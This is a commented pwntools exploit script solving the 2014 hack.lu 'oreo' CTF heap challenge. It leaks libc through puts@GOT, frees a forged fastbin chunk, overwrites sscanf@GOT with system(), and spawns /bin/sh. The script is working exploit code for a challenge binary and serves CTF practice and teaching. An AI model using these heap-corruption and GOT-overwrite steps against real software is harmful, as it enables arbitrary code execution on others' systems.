| from pwn import *
# Target binary, the libc it was built against, and a local process to drive.
elf = ELF('./oreo')
libc = ELF('./libc.so.6')
p = process('./oreo')
# Uncomment to dump every byte sent and received on the tube:
# context.log_level = 'debug'
def add(descrip, name):
    """Menu option 1: add a rifle.

    The lines go out in the order the program reads them -- the name first,
    then the description -- which is the reverse of the argument order.
    Nothing is waited for between the sends; the tube just buffers them.
    """
    for line in ('1', name, descrip):
        p.sendline(line)
def show_rifle():
    """Menu option 2: list the rifles.

    Consumes output up to and including the first separator line, so the
    caller starts reading right at the rifle listing.
    """
    p.sendline('2')
    separator = '===================================\n'
    p.recvuntil(separator)
def order():
    """Menu option 3: place the order.

    Step 2 below relies on this freeing the rifles added so far (it is what
    frees the forged chunk) -- confirm against the binary's order handler.
    """
    choice = '3'
    p.sendline(choice)
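def message(notice):
    """Menu option 4: leave a message consisting of the single line *notice*."""
    p.sendline('4')
    p.sendline(notice)


# step 1. leak libc base
# 27 filler bytes in the name run into the description pointer, which is
# replaced by puts@GOT; listing the rifle then prints the GOT entry back as
# the "description".
payload1 = 'a' * 27 + p32(elf.got['puts'])
add('a' * 25, payload1)
show_rifle()
p.recvuntil('===================================\n')
p.recvuntil('Description: ')
# The pointer is printed raw, so any of its bytes may be 0x0a.  A plain
# recvuntil('\n', drop=True) then stops short and u32() dies on a string
# shorter than 4 bytes.  Keep the newline (in that case it *is* a byte of
# the address) and keep reading until 4 bytes are in hand.  A 0x00 byte
# still truncates the leak (printf stops there); the page-alignment of the
# derived libc base is the place to catch that.
leak = b''
while len(leak) < 4:
    leak += p.recvuntil('\n')
puts_addr = u32(leak[:4])
log.success('puts_addr: ' + hex(puts_addr))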
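libc_base = puts_addr - libc.symbols['puts']
# A shared object is mapped at a page boundary, so a correct leak yields a
# page-aligned base.  Anything else means the leak was truncated (e.g. a
# 0x00 byte inside the address) or mis-parsed; abort here rather than carry
# a bogus system() address into the heap corruption below.  log.error()
# raises PwnlibException after logging.
if libc_base & 0xfff:
    log.error('libc base 0x%x is not page-aligned -- bad puts leak' % libc_base)
system_addr = libc_base + libc.symbols['system']
# Not used by the final stage (the command is typed in directly) but kept
# for the log output / interactive use.
binsh_addr = libc_base + next(libc.search('/bin/sh'))
log.success('system_addr: ' + hex(system_addr))
log.success('binsh_addr: ' + hex(binsh_addr))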
# step 2. free fake chunk at 0x0804A2A8
# One rifle already exists from the leak.  0x3e more are added here and one
# more (carrying the forged pointer) just below, 0x40 in total.  Presumably
# the rifle counter sits right in front of 0x0804a2a8 and doubles as the
# forged chunk's size field (0x40 is also the size written in payload3) --
# confirm against the binary's data layout.
for _ in range(1, 0x3f):
    add('a' * 25, 'a' * 27)

# Same name overflow as in step 1, this time aiming the description pointer
# at the forged chunk so that order() frees it.
payload2 = 'a' * 27 + p32(0x0804a2a8)
add('a' * 25, payload2)

# Message contents: 0x20 zero bytes, then 0x40 and 0x50.  These presumably
# land where free() looks for the forged chunk's size and its neighbour's
# size, so the fastbin checks pass -- confirm against the message buffer
# address.
payload3 = '\x00' * 0x20 + p32(0x40) + p32(0x50)
message(payload3)
order()
p.recvuntil('Okay order submitted!\n')
# step 3. get shell
# The next allocation presumably hands back the forged chunk from the
# fastbin; the description written into it points at sscanf@GOT, and the
# following message() stores through that pointer.
sscanf_got = elf.got['__isoc99_sscanf']
add(p32(sscanf_got), 'a')
message(p32(system_addr))
# sscanf@GOT now holds system(); the menu's next input read hands this line
# to it.  The explicit NUL keeps the command clean of the trailing newline.
p.sendline('/bin/sh\0')
p.interactive()
Reference: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/fastbin_attack/#2014-hacklu-oreo
Reference: https://norw1nd.github.io/2018/08/27/2014-hack-lu-oreo/